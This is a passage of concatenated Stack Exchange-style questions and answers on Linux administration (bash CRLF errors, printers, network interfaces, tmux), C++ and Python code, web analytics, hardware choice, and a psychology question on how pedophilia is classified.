Now, when a terminal is closed, I would like to make all others that remain open aware of the update. I prefer to do this without checking via $PS1 on every command that I type. I think it would be better to capture some sort of signal. How would you do that? If not possible, maybe a simple cronjob? How can we solve this puzzle? | Update bash history on other terminals when exiting one terminal | bash;shell;command history;signals | Creative and involving signals, you say? OK:

trap on_exit EXIT
trap on_usr1 USR1

on_exit() {
    history -a
    trap '' USR1
    killall -u $USER -USR1 bash
}

on_usr1() {
    history -n
}

Chuck that in .bashrc and go. This uses signals to tell every bash process to check for new history entries when another one exits. This is pretty awful, but it really works. How does it work? trap sets a signal handler for either a system signal or one of Bash's internal events. The EXIT event is any controlled termination of the shell, while USR1 is SIGUSR1, a meaningless signal we're appropriating. Whenever the shell exits, we:

1. Append all history to the file explicitly.
2. Disable the SIGUSR1 handler and make this shell ignore the signal.
3. Send the signal to all running bash processes from the same user.

When a SIGUSR1 arrives, we:

1. Load all new entries from the history file into the shell's in-memory history list.

Because of the way Bash handles signals, you won't actually get the new history data until you hit Enter the next time, so this doesn't do any better on that front than putting history -n into PROMPT_COMMAND. 
It does save reading the file constantly when nothing has happened, though, and there's no writing at all until the shell exits.There are still a couple of issues here, however. The first is that the default response to SIGUSR1 is to terminate the shell. Any other bash processes (running shell scripts, for example) will be killed. .bashrc is not loaded by non-interactive shells. Instead, a file named by BASH_ENV is loaded: you can set that variable in your environment globally to point to a file with:trap '' USR1in it to ignore the signal in them (which resolves the problem).Finally, although this does what you asked for, the ordering you get will be a bit unusual. In particular, bits of history will be repeated in different orders as they're loaded up and saved separately. That's essentially inherent in what you're asking for, but do be aware that up-arrow history becomes a lot less useful at this point. History substitutions and the like will be shared and work well, though. |
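For comparison, the PROMPT_COMMAND variant the answer alludes to in its last sentence — simpler than the signal machinery, at the cost of touching the history file at every prompt:

```shell
# Alternative for ~/.bashrc: merge history at each prompt instead of on exit.
shopt -s histappend                        # append to $HISTFILE, don't rewrite it
PROMPT_COMMAND='history -a; history -n'    # write our new lines, read everyone else's
```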
_unix.257137 | I can break this down into two subcomponents: Why/how does this automated mounting procedure create (and destroy) its own mounting point? Why do I have to manually create my own mount point when doing it myself (or how can I jump on the automated way of doing it)? I am not clear on the exact process that is going on when I insert a USB key into the system. I see there is a lot going on... for example, inserting an old USB2 1GB stick:

[76187.152010] usb 3-6: new high-speed USB device number 18 using ehci-pci
[76187.285314] usb 3-6: New USB device found, idVendor=1221, idProduct=3234
[76187.285317] usb 3-6: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[76187.285319] usb 3-6: Product: Flash Disk
[76187.285321] usb 3-6: Manufacturer: USB2.0
[76187.285323] usb 3-6: SerialNumber: 100000000000099E
[76187.285627] usb-storage 3-6:1.0: USB Mass Storage device detected
[76187.285704] scsi host27: usb-storage 3-6:1.0
[76188.285460] scsi 27:0:0:0: Direct-Access USB2.0 Flash Disk 2.60 PQ: 0 ANSI: 2
[76188.285731] sd 27:0:0:0: Attached scsi generic sg11 type 0
[76188.286201] sd 27:0:0:0: [sdk] 2048000 512-byte logical blocks: (1.04 GB/1000 MiB)
[76188.291250] sd 27:0:0:0: [sdk] Write Protect is off
[76188.291255] sd 27:0:0:0: [sdk] Mode Sense: 0b 00 00 08
[76188.292333] sd 27:0:0:0: [sdk] No Caching mode page found
[76188.292337] sd 27:0:0:0: [sdk] Assuming drive cache: write through
[76188.296951] sdk: sdk1
[76188.300321] sd 27:0:0:0: [sdk] Attached SCSI removable disk

and that it gets mounted like this:

/dev/sdk1 on /media/madivad/5859-77E7 type vfat (rw,nosuid,nodev,uid=1000,gid=1000,shortname=mixed,dmask=0077,utf8=1,showexec,flush,uhelper=udisks2)

Is it something in the automount process that creates (and later destroys) a directory for the mounting process? 
Am I able to identify something on the mount command line to create this directly as part of the process and later remove it on umount? Is this something that you would normally automate into a script, to remember to first create and mount something and then later umount it and remove the directory? I suppose a part of the process that annoys me is that I end up leaving directories that I forget to remove, especially when I'm testing things. I would like that (for example) when I mount something:

sudo mount /dev/sdk1 /mnt/usbkey1g

if the mount point is already created and/or in use I get a warning, but more importantly, if it's NOT there, it is created on the fly. Likewise, have it removed when I umount the key. I have Ubuntu 14.04 LTS installed in both Desktop and Server flavours. I have asked the question here as opposed to AU primarily because I am asking this independent of the actual OS and with reference to Linux generally, but as it applies to me. Feel free to have this migrated to AU if it is more appropriate there. Cheers. | Understanding the automated mounting of USB Thumbdrive and doing it myself | ubuntu;mount;usb drive | null |
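One possible shape for the script the question describes, as a hedged sketch — the helper names (mnt, umnt) and the example device/mount-point paths are made up for illustration; mountpoint(1) comes from util-linux:

```shell
mnt() {                            # usage: mnt /dev/sdk1 /mnt/usbkey1g
    dev=$1 dir=$2
    if mountpoint -q "$dir" 2>/dev/null; then
        echo "warning: $dir is already in use as a mount point" >&2
        return 1
    fi
    mkdir -p "$dir" && mount "$dev" "$dir"   # create the directory on the fly
}

umnt() {                           # usage: umnt /mnt/usbkey1g
    umount "$1" && rmdir "$1"      # rmdir only removes the directory if empty
}
```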
_cogsci.12248 | I've recently read an article about Generation Z, early 20-year-olds born after 1995 in the workforce (similar to this one). The article suggests that unlike previous generations, where ambiguous goals may inspire 30-somethings to do their best work, the 20-year-olds from Generation Z prefer to have things broken down into very clear chunks. An example may be in order: "Compare the sales figures report" versus: "We need a sales report for the investor meeting by Friday morning; get sales figures from Angela, have Bill help with graphics and verify figures with Jeff. If you are late, we will penalize you." The article continues to state that if faced with the first scenario, a 20-something would get frustrated and start seeking another job, while more detailed information would help them rise to the task. Why are some people uncomfortable and unproductive when faced with ambiguous or uncertain goals/challenges? | Why do some people not perform well with ambiguity and uncertainty? | cognitive psychology;social psychology;behaviorism | I'm not 100% sure if this is what you were intending to ask, because your initial opening was about Generation Z (which is at the large cultural level) while on the other hand your question written in bold seemed to be geared towards the individual. I have tried incorporating both parts into this answer. In essence I could not tell which of the two concepts in psychology you were interested in: Uncertainty Avoidance or Proactive Personality (the lack of which is what you describe). There is an intersection between the two concepts. You may start here in case you want to look deeper into the latter. Background to Answer: Of particular interest in this study is the macro dimension of uncertainty avoidance measured at an individual level. Cultures high on uncertainty avoidance are risk averse. Individuals in these cultures prefer stability in their lives and careers. They want their environment to be predictable. 
To foster compliance among their members, cultures high in uncertainty avoidance structure behavior through such mechanisms as laws, religion or customs. Vague situations are avoided in high uncertainty avoidance cultures, and group norms and rules reduce ambiguity. Individuals tend to attach themselves to the dominant cultural group and comply with its expectations (Hofstede, 1980). However, there has been a suggestion in organizational research that rather than the more passive attachment to the dominant group, some cultures actively try to reduce uncertainty by controlling their future environment. For example, Schneider and DeMeyer (1991) suggested that managers in high uncertainty avoidance cultures are likely to engage in proactive behaviors in an attempt to adapt to a dynamic environment. Geletkanycz (1997) also found that executives who are high on uncertainty avoidance in their cultural background seek strategic solutions that respond to dynamic environments. That is, they engage in adaptation as a way of reducing risk. Because of this alternative way of adapting to uncertainty, Geletkanycz (1997) called for further research to examine the issue that not all individuals react to risk by adhering to the norm; rather, some adjust to put themselves in a safer position in the future. Research has also identified that individuals high on uncertainty avoidance make choices for uncertain outcomes that involve gains (Ladbury & Hinsz, 2009). For example, individuals can be induced to volunteer for treatment in a randomly assigned process if they are offered monetary compensation for showing up (Harrison, Lau & Rutstrom, 2009). An individual's income can also have an influence on uncertainty avoidance and outcomes. 
For example, Yang-Ming (2008) found that as income increased, individuals high on uncertainty avoidance were more willing to take risks.

Relation between Uncertainty Avoidance and Productivity (Individual Level)

In her research with business executives, Geletkanycz (1997) hypothesized that top managers whose background cultures were high on uncertainty avoidance would be uncomfortable with uncertainty. Because of their need for structure, she predicted that they would be resistant to change. They would avoid taking action to alter their situation. However, what she found in her research was that managers whose background cultures were high in uncertainty avoidance reduced their feeling of uncertainty by adapting to the environment. She surmised that amid the dramatic changes related to technology and globalization, it was safer and less risky for these executives to adjust to the changing environment rather than inflexibly hanging on to what is known.

Relation between Uncertainty Avoidance and Productivity (Macro Level)

The cultural value of uncertainty avoidance influenced whether Irish firms were successful as compared to German firms (Rauch, Frese, & Sonnentag, 2000). Ireland scores low on uncertainty avoidance in contrast to Germany, which is high on the value. It was found that successful small business owners in Ireland did not plan. Rather, customers in that culture valued flexibility and quick solutions to problems. In contrast, German business owners were more successful when they did plan. It was proposed by these researchers that in such high uncertainty avoidance cultures, it was expected that individuals engage in careful planning to reduce risk by attempting to control future events. 
However, the results were more consistent with the interpretation made by Schneider and DeMeyer (1991), in that they found that planning is culturally appropriate, and this detailed planning resulted in a successful relationship with customers who also valued planning (Rauch, Frese, & Sonnentag, 2000).

Primary Source: The Two Faces of Uncertainty Avoidance: Attachment and Adaptation. David S. Baker and Kerry D. Carson, University of Louisiana at Lafayette.

Citations within Source:
Culture's Consequences: International Differences in Work-Related Values. Hofstede, G. (1980). Newbury Park, CA: Sage.
Interpreting and responding to strategic issues: The impact of national culture. Schneider, S. C., & DeMeyer, A. (1991). Strategic Management Journal, 12(4), 307-320.
Uncertainty avoidance influences choices for potential gains but not losses. Ladbury, J., & Hinsz, V. B. (2009). Current Psychology, 28(3), 187-193.
Corporate cash holdings, uncertainty avoidance, and the multinationality of firms. Ramirez, A., & Tadesse, S. (2009). International Business Review, 18(4), 387-403. |
_webapps.79919 | I have a list I created and I want to add my account as a member of the list I created. I have tried looking for an answer online but can't find one. | How do I add my Twitter feed to my own list? | twitter | null |
_unix.289074 | I'm on Ubuntu Mate 16.04 using terminator as my terminal. And using ZSH version 5.1.1. I'd rather change the keybinding to the left arrow key to emulate fish in a way. Anyone know how? | How to change the key for autocompletion in ZSH? | zsh;keyboard shortcuts;autocomplete | null |
_softwareengineering.200709 | There are some (quite rare) cases where there is a risk of:reusing a variable which is not intended to be reused (see example 1),or using a variable instead of another, semantically close (see example 2).Example 1:var data = this.InitializeData();if (this.IsConsistent(data, this.state)){ this.ETL.Process(data); // Alters original data in a way it couldn't be used any longer.}// ...foreach (var flow in data.Flows){ // This shouldn't happen: given that ETL possibly altered the contents of `data`, it is // not longer reliable to use `data.Flows`.}Example 2:var userSettingsFile = SettingsFiles.LoadForUser();var appSettingsFile = SettingsFiles.LoadForApp();if (someCondition){ userSettingsFile.Destroy();}userSettingsFile.ParseAndApply(); // There is a mistake here: `userSettingsFile` was maybe // destroyed. It's `appSettingsFile` which should have // been used instead.This risk can be mitigated by introducing a scope:Example 1:// There is no `foreach`, `if` or anything like this before `{`.{ var data = this.InitializeData(); if (this.IsConsistent(data, this.state)) { this.ETL.Process(data); }}// ...// A few lines later, we can't use `data.Flows`, because it doesn't exist in this scope.Example 2:{ var userSettingsFile = SettingsFiles.LoadForUser(); if (someCondition) { userSettingsFile.Destroy(); }}{ var appSettingsFile = SettingsFiles.LoadForApp(); // `userSettingsFile` is out of scope. There is no risk to use it instead of // `appSettingsFile`.}Does it look wrong? Would you avoid such syntax? Is it difficult to understand by beginners? | Is the usage of internal scope blocks within a function bad style? 
| c#;coding style;language features;scope | If your function is so long that you cannot recognize any unwanted side effects or illegal reuse of variables any more, then it is time to split it up into smaller functions - which makes an internal scope pointless. To back this up with some personal experience: some years ago I inherited a C++ legacy project with ~150K lines of code, and it contained a few methods using exactly this technique. And guess what - all of those methods were too long. As we refactored most of that code, the methods became smaller and smaller, and I am pretty sure there are no remaining internal scope methods any more; they are simply not needed. |
_codereview.7376 | I'm learning Java, although because of work I didn't have much time to go to classes. We had a final project to do, but since I'm more familiarised with Python I'm not sure if I'm doing Java correctly... I'm also a bit confused about attributes and constructors; I don't really understand the use of them. For this work we have to write a server class and a client class. We have 4 files, one with times (in seconds) and points for bike female and male, and others with times and points for run female and male. We then have a times file where each athlete has the time (minutes) for bike and run. We need to calculate the points for each time with linear interpolation, and then sort them, to see which athlete was the best one. Here's what I've done for the server class:import java.io.File;import java.io.FileNotFoundException;import java.io.FileReader;import java.util.ArrayList;import java.util.Scanner;public class Scorer {private String bike;private String run;private ArrayList<ArrayList<Integer>> athletes;private boolean gender;public Scorer(String bikeF, String runF, ArrayList<ArrayList<Integer>> athletes) { this.bike = bikeF; this.run = runF; this.athletes = athletes; }public Scorer(ArrayList<ArrayList<Integer>> athletes, boolean gender) { this.athletes = athletes; this.gender = gender; if (gender == true) { this.bike = bike + "F.tab"; this.run = run + "F.tab"; } else { this.bike = bike + "M.tab"; this.run = run + "M.tab"; }}public int[][] valsProximos(String table, ArrayList<ArrayList<Integer>> athletes, int n) throws FileNotFoundException { // compare file times and points with array to find distances and points closest to calculate linear interpolation Scanner tables = new Scanner (new FileReader(table)); int [][] tabPoints = new int [9][2]; // this case, each column has a meaning, 1 athlete 2 points (if equals) 3 athlete 4 difference between times 5 max time 6 max points 7 athlete 8 difference between times 9 min time 10 min points int [][] values = new int 
[athletes.size()][10]; for (int i=0; i<tabPoints.length;i++) { for (int j =0;j<tabPoints[0].length;j++) tabPoints[i][j]= tables.nextInt(); } for (int i=0; i<athletes.size(); i++) { for (int j=0; j<tabPoints.length; j++) { if (athletes.get(i).get(n) == tabPoints[j][0]) { values[i][0] = athletes.get(i).get(0); values[i][1] = tabPoints[j][1]; } else { if (tabPoints[j][0] > athletes.get(i).get(n)) { // calculate difference between each time and the time in the table int dif = tabPoints[j][0] - athletes.get(i).get(n); if (values[i][2] != athletes.get(i).get(0)) { values[i][2] = athletes.get(i).get(0); values[i][3] = dif; values[i][4] = tabPoints[j][0]; //maxTime values[i][5] = tabPoints[j][1]; // maxPoint } else if (dif < values[i][3]) { values[i][3] = dif; values[i][4] = tabPoints[j][0]; values[i][5] = tabPoints[j][1]; } } else { int dif1 = athletes.get(i).get(n) - tabPoints[j][0]; if (values[i][6] != athletes.get(i).get(0)) { values[i][6] = athletes.get(i).get(0); values[i][7] = dif1; values[i][8] = tabPoints[j][0]; // minTime values[i][9] = tabPoints[j][1]; // minPoint } else { if (dif1 < values[i][7]) { values[i][7] = dif1; values[i][8] = tabPoints[j][0]; values[i][9] = tabPoints[j][1]; } } } } } } return values;}public double intLinear(int maxTime, int time, int minTime, int maxPoint, int minPoint) { // calculate points given time acRunding to linear interpolation double intLinear = (double)(maxTime - time)/(maxTime - minTime) * minPoint + (double)(time - minTime)/(maxTime - minTime) * maxPoint; // round to closest number double athletePoint = (double)Math.round(intLinear); return athletePoint;}public int[][] Score(int [][] valBike, int [][] valRun, ArrayList<ArrayList<Integer>> athletes) { int [][] punctuate = new int [athletes.size()][4]; for (int i=0; i<valBike.length; i++) { if (athletes.get(i).get(0) == valBike[i][0]){ punctuate[i][0] = athletes.get(i).get(0); punctuate[i][1] = valBike[i][1]; } else { int maxTime = valBike[i][4]; int time = 
athletes.get(i).get(1); int minTime = valBike[i][8]; int maxPoint = valBike[i][5]; int minPoint = valBike[i][9]; double athletePoint = intLinear(maxTime, time, minTime, maxPoint, minPoint); punctuate[i][0] = athletes.get(i).get(0); punctuate[i][1] = (int) athletePoint; } if (athletes.get(i).get(0) == valRun[i][0]){ // Verify that we are inserting points at right position //if (punctuate[i][0] == valRun[i][0]) { punctuate[i][2] = valRun[i][1]; //} } else { int maxTime = valRun[i][4]; int time = athletes.get(i).get(2); int minTime = valRun[i][8]; int maxPoint = valRun[i][5]; int minPoint = valRun[i][9]; double athletePoint = intLinear(maxTime, time, minTime, maxPoint, minPoint); //if (punctuate[i][0] == valRun[i][2]) { punctuate[i][2] = (int) athletePoint; //} } } for (int i=0; i<punctuate.length; i++) { // total points punctuate[i][3] = punctuate[i][1] + punctuate[i][2]; }return punctuate;}public int[][] ScoreF(int [][] order, int colNum) { for (int row=0; row< order.length; row++){ for (int row2=row+1; row2<order.length; row2++){ // modify acRunding to the column we want to sort if(order[row][colNum]<order[row2][colNum]){ for(int column=0; column<order[0].length; column++) { int temp = order[row][column]; order[row][column] = order[row2][column]; order[row2][column] = temp; } } } } return order;}}and the client class: import java.io.BufferedWriter; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; import java.io.PrintWriter; import java.util.ArrayList; import java.util.Scanner; public class DualthonProof {/** * @param args * @throws IOException */public static void main(String[] args) throws IOException { // ask user name of file Scanner input = new Scanner(System.in); System.out.println("Enter file name bike female:"); String bikeF = input.nextLine(); System.out.println("Enter file name female run:"); String runF = input.nextLine(); System.out.println("Enter file name male bike:"); String bikeM = 
input.nextLine(); System.out.println("Enter file name male run:"); String runM = input.nextLine(); String tabBikeF = "bikeF.tab"; String tabRunF = "runF.tab"; String tabBikeM = "bikeM.tab"; String tabRunM = "runM.tab"; // if user didn't write anything, use the default file if (bikeF.equals("")) bikeF = tabBikeF; if (runF.equals("")) runF = tabRunF; if (bikeM.equals("")) bikeM = tabBikeM; if (runM.equals("")) runM = tabRunM; Scanner ficheiro = new Scanner (new FileReader ("times.txt")); // Ignore first line ficheiro.nextLine(); ArrayList<ArrayList<Integer>> athleteF = new ArrayList<ArrayList<Integer>>(); ArrayList<ArrayList<Integer>> athleteM = new ArrayList<ArrayList<Integer>>(); while (ficheiro.hasNextLine()) { String row = ficheiro.nextLine(); String[] section = row.split("\t"); String[] split1 = section[2].split(":"); String[] split2 = section[3].split(":"); // Convert string to integer int num1 = Integer.parseInt(split1[0]); int num2 = Integer.parseInt(split1[1]); int secsBike = num1 * 60 + num2; int num3 = Integer.parseInt(split2[0]); int num4 = Integer.parseInt(split2[1]); int secsRun = num3 * 60 + num4; if (section[1].equals("F")) { athleteF.add(new ArrayList<Integer>()); athleteF.get(athleteF.size()-1).add(Integer.parseInt(section[0])); athleteF.get(athleteF.size()-1).add(secsBike); athleteF.get(athleteF.size()-1).add(secsRun); } else if (section[1].equals("M")) { athleteM.add(new ArrayList<Integer>()); athleteM.get(athleteM.size()-1).add(Integer.parseInt(section[0])); athleteM.get(athleteM.size()-1).add(secsBike); athleteM.get(athleteM.size()-1).add(secsRun); } } Scorer ptsF = new Scorer(bikeF, runF, athleteF); int [][] valBikeF = ptsF.valsProximos(bikeF, athleteF, 1); int [][] valRunF = ptsF.valsProximos(runF, athleteF, 2); int [][] pointingF = ptsF.Score(valBikeF, valRunF, athleteF); int [][] sortedF = ptsF.ScoreF(pointingF, 3);} } | Is this correct Java? 
Attributes and constructors especially | java;homework | At first sight, the biggest problem is the double generic lists, like:ArrayList<ArrayList<Integer>> athleteF = new ArrayList<ArrayList<Integer>>();It's really hard to read and error-prone, since the lots of magic numbers which indexes the array. It's easy to mix-up the indexes and hard to remember which index stores which value. Use at least constants instead of the numbers.Anyway, you should create an Athlete class which stores all data of an athlete and store Athlete objects in the list:final List<Athlete> athleteF = new ArrayList<Athlete>();public class Athlete { // TODO: set a proper name for this field private int someDataNeedName; private int secsBike; private int secsRun; public Athlete(final int someDataNeedName, final int secsBike, final int secsRun) { this.someDataNeedName = someDataNeedName; this.secsBike = secsBike; this.secsRun = secsRun; } public int getSomeDataNeedName() { return someDataNeedName; } public void setSomeDataNeedName(final int someDataNeedName) { this.someDataNeedName = someDataNeedName; } public int getSecsBike() { return secsBike; } public void setSecsBike(final int secsBike) { this.secsBike = secsBike; } public int getSecsRun() { return secsRun; } public void setSecsRun(final int secsRun) { this.secsRun = secsRun; }}This class stores its data with names (these are the names of the fields).Usage:final Athlete athlete = new Athlete(Integer.parseInt(section[0]), secsBike, secsRun);if (section[1].equals(F)) { athleteF.add(athlete);} else if (section[1].equals(M)) { ...}(I hope it helps a little bit and somebody has time for a complete review.) |
_unix.57152 | I have a list of 900 URLs. Each page contains one image. Some images are duplicates (with the same URL). I want to download 900 images, including duplicates. I was able to download all pages and the embedded images (and ignored all other file types) with wget. But it seems to me that wget skips an image when it was already downloaded before. So I had 900 pages, but only around 850 images. (How) can I tell wget to download duplicates, too? It could append _1, _2, ... to the file name. My wget command:

wget --input-file=urls.txt --output-file=log.txt --wait 1 --random-wait --page-requisites --exclude-domains code.jquery.com --span-hosts --reject thumbnail*.png -P downloadfolder

| How to also download duplicate images? | wget | null |
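One workaround sketch: the skipping happens because a single wget run deduplicates URLs across the whole --input-file, so fetching each page in its own run (and its own numbered directory) makes a repeated image URL get downloaded again. fetch_all is an illustrative name, not a wget feature:

```shell
fetch_all() {                      # usage: fetch_all urls.txt downloadfolder
    n=0
    while IFS= read -r url; do
        n=$((n+1))
        # one numbered directory per page also avoids file-name collisions
        wget --page-requisites --directory-prefix="$2/$n" "$url"
    done < "$1"
}
```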
_unix.19458 | Given a commodity PC, we would like to use it to execute some tasks in the background round the clock.Basically, we would like to have commands like:add-task *insert command here*list-tasksremove-task(s)The added tasks should simply be put in a queue and executed one after another in the background (keeping running after logout of the shell).Is there any simple script/program that does this? | Simple queuing system? | process;process management;scheduling | There's a standard batch command that does more or less what you're after. More precisely, batch executes the jobs when the system load is not too high, one at a time (so it doesn't do any parallelization). The batch command is part of the at package.echo 'command1 --foo=bar' | batch echo 'command2 $(wibble)' | batchat -q b -l # on many OSes, a slightly shorter synonym is: atq -q bat -q b -r 1234 # Unschedule a pending task (atq gives the task ID) |
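The interface the question asks for maps almost one-to-one onto the commands the answer shows; a thin-wrapper sketch (assumes the at package with its daemon running; atrm is the shorthand for at -r):

```shell
# Wrappers over batch/atq/atrm; "b" is the batch queue used in the answer.
add_task()    { echo "$*" | batch; }       # add_task 'long-command --flags'
list_tasks()  { atq -q b; }                # prints job IDs and scheduled times
remove_task() { atrm "$@"; }               # remove_task <job-id> [<job-id>...]
```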
_vi.10863 | I would like to modify the behavior of one of my mappings, but only when Vim is reading data which was piped to it by $ vipe. The mapping closes/quits the current window/session depending on certain conditions. When Vim is reading data which was piped to it, I would like the mapping to execute :cquit, so that it reports an error to the shell and the output of the shell command is not displayed in the terminal when I quit (or the rest of the pipeline is not processed). $ vipe is a shell utility, included in the moreutils package, whose man page contains this:

NAME
       vipe - edit pipe

SYNOPSIS
       command1 | vipe | command2

DESCRIPTION
       vipe allows you to run your editor in the middle of a unix pipeline and edit the data that is being piped between programs. Your editor will have the full data being piped from command1 loaded into it, and when you save, that data will be piped into command2.

ENVIRONMENT VARIABLES
       EDITOR
           Editor to use.
       VISUAL
           Also supported to determine what editor to use.

As an example, one could use it to count the number of files/directories in the current working directory with $ ls and $ wc -l, using Vim in the middle to interactively remove some entries:

$ ls | vipe | wc -l

But I don't know how to detect that Vim has been invoked by $ vipe. I tried to use the StdinReadPre and StdinReadPost events like this:

augroup standard_input
    autocmd!
    autocmd StdinReadPre * nno cd :echo 'hello'<cr>
    autocmd StdinReadPost * nno cd :echo 'hello'<cr>
augroup END

But it didn't work: when hitting cd, hello was not displayed. The reason why it didn't work is probably because Vim wasn't invoked with the - argument, because this works:

$ ls | vim -

And :h StdinReadPre and :h StdinReadPost seem to confirm this:

                                                        *StdinReadPost*
StdinReadPost      After reading from the stdin into the buffer, before executing the modelines. Only used when the - argument was used when Vim was started |--|.
                                                        *StdinReadPre*
StdinReadPre       Before reading from stdin into the buffer. 
Only used when the - argument was used when Vim was started |--|.
I also tried to check the contents of the internal variables v:progname and v:progpath, but they both report vim, not vipe. Is there a way to detect whether Vim has been invoked by another shell command (vipe, git commit, ...)? | How to detect whether Vim has been invoked by another shell command? | autocmd;invocation;startup;quit | Since vipe, git commit (and many other programs which invoke an editor) use the VISUAL and EDITOR variables (unless you specify an editor for git with git config core.editor), you can use that variable to invoke Vim in such a way that you can detect it:
export EDITOR='env called=1 vim'
Then, in Vim, $called will have a value of 1, which you can use to detect whether it was called by a command.
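The mechanism in the accepted answer — smuggling a marker variable through the environment of the spawned editor — can be demonstrated outside Vim. A Python sketch (the variable name CALLED is purely illustrative, not anything vipe itself sets):

```python
import os
import subprocess
import sys

def spawn_marked_child():
    """Launch a child with an extra env var, the way `env called=1 vim` does."""
    env = dict(os.environ, CALLED="1")
    # The child plays the role of the editor checking its environment
    child = subprocess.run(
        [sys.executable, "-c",
         "import os; print(os.environ.get('CALLED', '0'))"],
        env=env, capture_output=True, text=True)
    return child.stdout.strip()

print(spawn_marked_child())  # 1
```

In Vim the check is the same idea: the editor inspects its environment ($called) rather than its own name or arguments.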
_unix.30798 | In the package that I'm building, there are symbolic links within the Buildroot directory. For instance this:
/home/sg/impkg/buildroot/dir1/bin/w_be -> /home/sg/impkg/buildroot/dir2/targ/be
This is making rpmbuild fail with the error:
RPM build errors: Symlink points to BuildRoot: /home/sg/impkg/buildroot/dir1/bin/w_be -> /home/sg/impkg/buildroot/dir2/targ/be
In my %files section, I have only included the buildroot directory, which is what I want. Following is a snippet from my spec-file:
Summary: research compiler tool set
License: GPL
Name: %{name}
Version: %{version}
Release: %{release}
Source: %{name}-%{version}.tar.gz
Prefix: /usr
Group: Development/Tools
Autoreq: 0
Autoprov: 0

%description
research compiler tool set

%prep
%setup -q

%build
rm -rf %{buildroot}/%{name}-%{version}
mkdir %{buildroot}/%{name}-%{version}
cd %{buildroot}/%{name}-%{version} && %{_builddir}/%{name}-%{version}/./configure --prefix=%{buildroot}/%{name}-%{version}
make %{?_smp_mflags} -C %{buildroot}/%{name}-%{version}

%install
cd %{buildroot}/%{name}-%{version} && make DESTDIR=%{buildroot}/%{name}-%{version} install

%clean
rm -rf %{buildroot}/%{name}-%{version}

%files
%defattr(755,-,-)
/%{name}-%{version}
I have to adhere to the logic, which means I cannot remove these links from the Makefiles... how do I solve this problem and generate the RPM? | rpmbuild error: Symlink points to BuildRoot | rpm | null |
_unix.315636 | Maximizing a window on Linux Mint 18 Xfce does not work when I use the left mouse button, and only when the window occupies half the screen; when I use the right mouse button, it works. | Maximize window on Linux Mint 18 Xfce not working | xfce;window manager | null |
_unix.288063 | What's the difference between nohup foocommand and nohup foocommand &? I understand that & marks the task/job/process as running in the background, but does that make it more resilient than it would otherwise be? What happens in both scenarios if my SSH session times out or if I get disconnected? | What happens if I don't use & at the end of a nohup command? | centos;nohup | null |
_webmaster.8633 | I'm currently not using any sort of fancy stat-tracking software such as FeedBurner, but I occasionally look at Google's stats in their Webmaster Tools just to get a rough idea of whether the number of subscribers is going up or down. This only gives the number of users subscribed through Google products, as they explain in their help documents:
Subscriber stats display the number of Google users who have subscribed to your feeds using any Google product (such as Reader, iGoogle, or Orkut). Because users can subscribe to feeds using many different aggregators or RSS readers, the actual number of subscribers to your site may be higher.
I used to use Google Reader very regularly but haven't opened it in a while now. The way I understand it, this means that even though I haven't touched any of those feeds in a long time, I'm still technically subscribed to them and will therefore be included in Google's statistic. Is this correct? Also, since Google runs FeedBurner, does this have any effect on their stats as well? | Do Google's feed statistics include former users? | google;statistics;feeds | null |
_cstheory.21891 | Given an $n\times m$ grid, let the bottom-left vertex be $s$ and the top-right vertex be $t$. Given $k$ non-consecutive edges on the upper horizontal line of the grid, I want to find an upper bound on the number of simple $st$-paths using those edges.
If I see the grid as a box in the plane, I can visualize an $st$-path as a rectilinear curve cutting this box. In this way I can associate each cell of the grid with one or the other partition, getting as a trivial upper bound the value of $2^{n^2}$. Is there anything better?
I also thought that, if I am considering only the paths using the $k$ given edges on the upper line, then I can map each of these paths to a cut of the grid graph into $k+1$ partitions. Do you know whether any non-trivial upper bound on this number is known?
Thanks for the help! | Number of $k$-cuts of grid graphs | graph theory;planar graphs;upper bounds | Consider this variation: we want to find the number of paths which go from $(1,1)$ to $(n-2,n)$ in an $(n-2)\times n$ solid grid; this can be done in almost $2^{n(n-2)}$ possible ways. Then it is simple to convert it to your case: just go up one step, then go left $n$ steps, again up one step, and then right $n$ steps. That path covers all of the $k$ edges, and these are just restricted versions; that means that, independent of $k$, the upper bound is big: $2^{O(n^2)}$.
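For completeness, a sketch of the standard step-counting argument that gives a matching trivial upper bound of the same $2^{O(n^2)}$ order (this derivation is my own, not from the answer):

```latex
% A simple s-t path in the n-by-m grid visits each of the nm vertices
% at most once, so it has length at most nm.  After the first step,
% every vertex offers at most 3 ways to continue (degree <= 4, minus
% the edge just traversed).  Hence, for m = O(n):
\[
  \#\{\text{simple } st\text{-paths}\} \;\le\; 4 \cdot 3^{\,nm-1}
  \;=\; 2^{O(nm)} \;=\; 2^{O(n^2)}.
\]
```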
_unix.26834 | I have a RedHat Linux server and I'm trying to make a copy of /var/lib/mysql/ibdata1, but I'm receiving an error saying permission denied and the file cannot be opened. I'm logged in as the root user and tried to use sudo cp... Any idea what I'm doing wrong? Sorry for my ignorance, but I don't know much about Unix systems. I also tried sudo su mysql to make the copy; it then asks for a password that should be the one I have, but it says it's wrong! | Can't make a copy of /var/lib/mysql/ibdata1 | rhel;sudo;mysql;cp | null |
_codereview.63518 | I am trying to implement a program which can convert numbers into words. My code can convert numbers between 0 and 999. It uses recursive function calls and simple arithmetic operations. Can you please review it and give me your feedback?
I used three different vectors to store words such as "Six" and "Eleven" and then access their indexes according to the input.
numberToWord.h
#ifndef numberToWord_H
#define numberToWord_H

#include <vector>
#include <string>

class numbertoword
{
public:
    numbertoword();
    ~numbertoword(){};
public:
    std::vector<std::string> one2nine;
    std::vector<std::string> elevent2ninteen;
    std::vector<std::string> twoDigit;
    std::vector<std::string> threeDigit;
public:
    void initialize();
    void convert(int number);
    int countNumber(int number);
    void calculate(int number, int count);
    void display(int digit);
private:
    int xN, yN;
    int originalNumber;
};
#endif
Source.cpp
#include <iostream>
#include "numberToWord.h"

numbertoword::numbertoword() : xN(0), yN(0), originalNumber(0)
{
}

void numbertoword::initialize()
{
    //one to nine
    one2nine.push_back("Zero");
    one2nine.push_back("One");
    one2nine.push_back("Two");
    one2nine.push_back("Three");
    one2nine.push_back("Four");
    one2nine.push_back("Five");
    one2nine.push_back("Six");
    one2nine.push_back("Seven");
    one2nine.push_back("Eight");
    one2nine.push_back("Nine");

    //eleven to ninteen
    elevent2ninteen.push_back("Eleven");
    elevent2ninteen.push_back("Twelve");
    elevent2ninteen.push_back("Thirteen");
    elevent2ninteen.push_back("Fourteen");
    elevent2ninteen.push_back("Fifteen");
    elevent2ninteen.push_back("Sixteen");
    elevent2ninteen.push_back("Seventeen");
    elevent2ninteen.push_back("Eighteen");
